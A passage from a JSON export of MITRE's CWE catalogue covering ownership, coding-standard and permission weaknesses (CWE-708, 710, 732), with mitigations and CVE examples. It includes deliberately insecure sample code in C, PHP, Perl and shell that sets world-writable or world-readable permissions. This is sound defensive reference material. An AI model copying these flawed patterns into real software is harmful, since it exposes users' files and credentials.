tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"276"}},{"attr":{"@_CAPEC_ID":"277"}},{"attr":{"@_CAPEC_ID":"278"}},{"attr":{"@_CAPEC_ID":"279"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"33"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"468"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"84"}}]},"Notes":{"Note":{"#text":"Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":[{"#text":"Failure to Enforce that Messages or Data are Well-Formed","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Enforcement of Message or Data Structure","attr":{"@_Date":"2020-02-24"}}]}},"708":{"attr":{"@_ID":"708","@_Name":"Incorrect Ownership Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software assigns an owner to a resource, but the owner is outside of the intended control sphere.","Extended_Description":"This may allow the resource to be manipulated by actors outside of the intended control sphere.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"282","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"345","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"],"Note":"An attacker could read and modify data for which they do not have permissions to access directly."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Policy","Description":"Periodically review the privileges and their owners."},{"Phase":"Testing","Description":"Use automated tools to check for privilege settings."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5101","Description":"File system sets wrong ownership and group when creating a new file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5101"},{"Reference":"CVE-2007-4238","Description":"OS installs program with bin owner/group, allowing modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4238"},{"Reference":"CVE-2007-1716","Description":"Manager does not properly restore ownership of a reusable resource when a user logs out, allowing privilege escalation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1716"},{"Reference":"CVE-2005-3148","Description":"Backup software restores symbolic links with incorrect uid/gid.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3148"},{"Reference":"CVE-2005-1064","Description":"Product changes the ownership of files that a symlink points to, instead of the symlink itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1064"},{"Reference":"CVE-2011-1551","Description":"Component assigns ownership of sensitive directory tree to a user account, which can be leveraged to perform privileged operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1551"}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This overlaps verification errors, permissions, and privileges.","A closely related weakness is the incorrect assignment of groups to a resource. It is not clear whether it would fall under this entry or require a different entry."]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09","Submission_Comment":"Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0."},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"710":{"attr":{"@_ID":"710","@_Name":"Improper Adherence to Coding Standards","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not follow certain coding rules for development, which can lead to resultant weaknesses or increase the severity of the associated vulnerabilities.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Document and closely follow coding standards."},{"Phase":["Testing","Implementation"],"Description":"Where possible, use automated tools to enforce the standards."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-09-09"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"}],"Previous_Entry_Name":{"#text":"Coding Standards Violation","attr":{"@_Date":"2017-11-08"}}}},"732":{"attr":{"@_ID":"732","@_Name":"Incorrect Permission Assignment for Critical Resource","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.","Extended_Description":"When a resource is given a permissions setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution or sensitive user data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","The developer might make certain assumptions about the environment in which the product operates - e.g., that the software is running on a single-user system, or the software is only accessible to trusted administrators. When the software is running in a different environment, the permissions become a problem."]}},{"Phase":"Installation","Note":"The developer may set loose permissions in order to minimize problems when the user first runs the program, then create documentation stating that permissions should be tightened. Since system administrators and users do not always read the documentation, this can result in insecure permissions being left unchanged."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker may be able to read sensitive information from the associated resource, such as credentials or configuration information stored in a file."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker may be able to modify critical properties of the associated resource to gain privileges, such as replacing a world-writable executable with a Trojan horse."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"An attacker may be able to destroy or corrupt critical data in the associated resource, such as deletion of records from a database."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc. Automated techniques may be able to detect the use of library functions that modify permissions, then analyze function calls for arguments that contain potentially insecure values.","However, since the software\'s intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated static analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes.","When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated static analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments."]}},{"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["Automated dynamic analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc.","However, since the software\'s intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated dynamic analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes.","When custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated dynamic analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments."]}},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Manual Static Analysis","Description":"Manual static analysis may be effective in detecting the use of custom permissions models and functions. The code could then be examined to identifying usage of the related functions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software."},{"Method":"Manual Dynamic Analysis","Description":"Manual dynamic analysis may be effective in detecting the use of custom permissions models and functions. The program could then be executed with a focus on exercising code paths that are related to the custom permissions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software."},{"Method":"Fuzzing","Description":"Fuzzing is not effective in detecting this weakness."},{"attr":{"@_Detection_Method_ID":"DM-11.1"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and watch for library functions or system calls on OS resources such as files, directories, and shared memory. Examine the arguments to these calls to infer which permissions are being used."]},"Effectiveness_Notes":"Note that this technique is only useful for permissions issues related to system resources. It is not likely to detect application-level business rules that are related to permissions, such as if a user of a blog system marks a post as \\"private,\\" but the blog system inadvertently marks it as \\"public.\\""},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inter-application Flow Analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria","Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Forced Path Execution"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When using a critical resource such as a configuration file, check to see if the resource has insecure permissions (such as being modifiable by any regular user) [REF-62], and generate an error or even exit the software if there is a possibility that the resource could have been modified by an unauthorized party."},{"Phase":"Architecture and Design","Description":"Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully defining distinct user groups, privileges, and/or roles. Map these against data, functionality, and the related resources. Then set the permissions accordingly. This will allow you to maintain more fine-grained control over your resources. [REF-207]","Effectiveness":"Moderate","Effectiveness_Notes":"This can be an effective strategy. However, in practice, it may be difficult or time consuming to define these areas when there are many different resources or user types, or if the applications features change rapidly."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"Phase":["Implementation","Installation"],"Description":"During program startup, explicitly set the default permissions or umask to the most restrictive setting possible. Also set the appropriate permissions during program installation. This will prevent you from inheriting insecure permissions from any user who installs or runs the program.","Effectiveness":"High"},{"Phase":"System Configuration","Description":"For all configuration files, executables, and libraries, make sure that they are only readable and writable by the software\'s administrator.","Effectiveness":"High"},{"Phase":"Documentation","Description":"Do not suggest insecure configuration changes in documentation, especially if those configurations can extend to resources and other programs that are outside the scope of the application."},{"Phase":"Installation","Description":"Do not assume that a system administrator will manually change the configuration to the settings that are recommended in the software\'s manual."},{"attr":{"@_Mitigation_ID":"MIT-37"},"Phase":["Operation","System Configuration"],"Strategy":"Environment Hardening","Description":"Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code sets the umask of the process to 0 before creating a file and writing \\"Hello world\\" into the file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define OUTFILE \\"hello.out\\"umask(0);FILE *out;out = fopen(OUTFILE, \\"w\\");if (out) {}","xhtml:br":["","","","","","",""],"xhtml:i":"/* Ignore CWE-59 (link following) for brevity */","xhtml:div":{"#text":"fprintf(out, \\"hello world!\\\\n\\");fclose(out);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-rw-rw- 1 username 13 Nov 24 17:58 hello.out"}],"Body_Text":["After running this program on a UNIX system, running the \\"ls -l\\" command might return the following output:","The \\"rw-rw-rw-\\" string indicates that the owner, group, and world (all users) can read the file and write to it."]},{"Intro_Text":"This code creates a home directory for a new user, and makes that user the owner of the directory. If the new directory cannot be owned by the user, the directory is deleted.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createUserDir($username){}","xhtml:div":{"#text":"$path = \'/home/\'.$username;if(!mkdir($path)){}if(!chown($path,$username)){}return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"return false;","attr":{"@_style":"margin-left:10px;"}},{"#text":"rmdir($path);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}},"Body_Text":["Because the optional \\"mode\\" argument is omitted from the call to mkdir(), the directory is created with the default permissions 0777. Simply setting the new user as the owner of the directory does not explicitly change the permissions of the directory, leaving it with the default. This default allows any user to read and write to the directory, allowing an attack on the user\'s files. The code also fails to change the owner group of the directory, which may result in access by unexpected groups.","This code may also be vulnerable to Path Traversal (CWE-22) attacks if an attacker supplies a non alphanumeric username."]},{"Intro_Text":"The following code snippet might be used as a monitor to periodically record whether a web site is alive. To ensure that the file can always be modified, the code uses chmod() to make the file world-writable.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$fileName = \\"secretFile.out\\";if (-e $fileName) {}my $outFH;if (! open($outFH, \\"&gt;&gt;$fileName\\")) {}my $dateString = FormatCurrentTime();my $status = IsHostAlive(\\"cwe.mitre.org\\");print $outFH \\"$dateString cwe status: $status!\\\\n\\";close($outFH);","xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"chmod 0777, $fileName;","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Couldn\'t append to $fileName: $!\\");","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-r--r-- 1 username 13 Nov 24 17:58 secretFile.out"},{"attr":{"@_Nature":"result"},"xhtml:div":"-rw-rw-rw- 1 username 13 Nov 24 17:58 secretFile.out"}],"Body_Text":["The first time the program runs, it might create a new file that inherits the permissions from its environment. A file listing might look like:","This listing might occur when the user has a default umask of 022, which is a common setting. Depending on the nature of the file, the user might not have intended to make it readable by everyone on the system.","The next time the program runs, however - and all subsequent executions - the chmod will set the file\'s permissions so that the owner, group, and world (all users) can read the file and write to it:","Perhaps the programmer tried to do this because a different process uses different permissions that might prevent the file from being updated."]},{"Intro_Text":"The following command recursively sets world-readable permissions for a directory and all of its children:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Shell"},"xhtml:div":"chmod -R ugo+r DIRNAME"},"Body_Text":"If this command is run from a program, the person calling the program might not expect that all the files under the directory will be world-readable. If the directory is expected to contain private data, this could become a security problem."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3482","Description":"Anti-virus product sets insecure \\"Everyone: Full Control\\" permissions for files under the \\"Program Files\\" folder, allowing attackers to replace executables with Trojan horses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3482"},{"Reference":"CVE-2009-3897","Description":"Product creates directories with 0777 permissions at installation, allowing users to gain privileges and access a socket used for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3897"},{"Reference":"CVE-2009-3489","Description":"Photo editor installs a service with an insecure security descriptor, allowing users to stop or start the service, or execute commands as SYSTEM.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3489"},{"Reference":"CVE-2020-15708","Description":"socket created with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15708"},{"Reference":"CVE-2009-3289","Description":"Library function copies a file to a new target and uses the source file\'s permissions for the target, which is incorrect when the source file is a symbolic link, which typically has 0777 permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3289"},{"Reference":"CVE-2009-0115","Description":"Device driver uses world-writable permissions for a socket file, allowing attackers to inject arbitrary commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0115"},{"Reference":"CVE-2009-1073","Description":"LDAP server stores a cleartext password in a world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1073"},{"Reference":"CVE-2009-0141","Description":"Terminal emulator creates TTY devices with world-writable permissions, allowing an attacker to write to the terminals of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0141"},{"Reference":"CVE-2008-0662","Description":"VPN product stores user credentials in a registry key with \\"Everyone: Full Control\\" permissions, allowing attackers to steal the credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0662"},{"Reference":"CVE-2008-0322","Description":"Driver installs its device interface with \\"Everyone: Write\\" permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0322"},{"Reference":"CVE-2009-3939","Description":"Driver installs a file with world-writable permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939"},{"Reference":"CVE-2009-3611","Description":"Product changes permissions to 0777 before deleting a backup; the permissions stay insecure for subsequent backups.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3611"},{"Reference":"CVE-2007-6033","Description":"Product creates a share with \\"Everyone: Full Control\\" permissions, allowing arbitrary program execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6033"},{"Reference":"CVE-2007-5544","Description":"Product uses \\"Everyone: Full Control\\" permissions for memory-mapped files (shared memory) in inter-process communication, allowing attackers to tamper with a session.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5544"},{"Reference":"CVE-2005-4868","Description":"Database product uses read/write permissions for everyone for its shared memory, allowing theft of credentials.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4868"},{"Reference":"CVE-2004-1714","Description":"Security product uses \\"Everyone: Full Control\\" permissions for its configuration files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1714"},{"Reference":"CVE-2001-0006","Description":"\\"Everyone: Full Control\\" permissions assigned to a mutex allows users to disable network connectivity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0006"},{"Reference":"CVE-2002-0969","Description":"Chain: database product contains buffer overflow that is only reachable through a .ini configuration file - which has \\"Everyone: Full Control\\" permissions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0969"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO03-J","Entry_Name":"Create files with appropriate access permission"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ENV03-J","Entry_Name":"Do not grant dangerous combinations of permissions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO06-C","Entry_Name":"Create files with appropriate access 